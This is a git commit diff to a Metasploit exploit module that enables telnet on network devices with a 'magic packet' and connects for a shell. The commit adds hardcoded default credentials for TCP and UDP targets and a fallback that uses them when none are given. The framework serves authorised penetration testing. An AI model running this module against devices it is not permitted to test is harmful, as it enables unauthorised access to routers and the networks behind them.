Use default creds specific to protocol
parent
1f40afea9c
commit
fba30d47a2
|
@ -39,9 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
},
|
||||
'Targets' => [
|
||||
['Automatic (detect TCP or UDP)', proto: :auto],
|
||||
['TCP (typically older devices)', proto: :tcp],
|
||||
['UDP (typically newer devices)', proto: :udp]
|
||||
['Automatic (detect TCP or UDP)',
|
||||
proto: :auto
|
||||
],
|
||||
['TCP (typically older devices)',
|
||||
proto: :tcp,
|
||||
username: 'Gearguy',
|
||||
password: 'Geardog'
|
||||
],
|
||||
['UDP (typically newer devices)',
|
||||
proto: :udp,
|
||||
username: 'admin',
|
||||
password: 'password'
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
@ -49,13 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
register_options([
|
||||
Opt::RPORT(23),
|
||||
OptString.new('MAC', [true, 'MAC address of device']),
|
||||
OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']),
|
||||
OptString.new('PASSWORD', [true, 'Password on device', 'Geardog'])
|
||||
OptString.new('USERNAME', [false, 'Username on device']),
|
||||
OptString.new('PASSWORD', [false, 'Password on device'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
@proto = target[:proto]
|
||||
@username = datastore['USERNAME'] || target[:username]
|
||||
@password = datastore['PASSWORD'] || target[:password]
|
||||
|
||||
# Detect TCP or UDP
|
||||
if @proto == :auto
|
||||
|
@ -71,6 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
# Try to use default creds
|
||||
unless @username && @password
|
||||
tgt = targets.find { |t| t[:proto] == @proto }
|
||||
@username = tgt[:username]
|
||||
@password = tgt[:password]
|
||||
end
|
||||
|
||||
# Shell it
|
||||
exploit_telnetenabled
|
||||
connect_telnetd
|
||||
|
@ -79,11 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def exploit_telnetenabled
|
||||
# Generate the magic packet
|
||||
print_status('Generating magic packet')
|
||||
payload = magic_packet(
|
||||
datastore['MAC'],
|
||||
datastore['USERNAME'],
|
||||
datastore['PASSWORD']
|
||||
)
|
||||
payload = magic_packet(datastore['MAC'], @username, @password)
|
||||
|
||||
# Send the magic packet via TCP or UDP
|
||||
begin
|
||||
|
|
Loading…
Reference in New Issue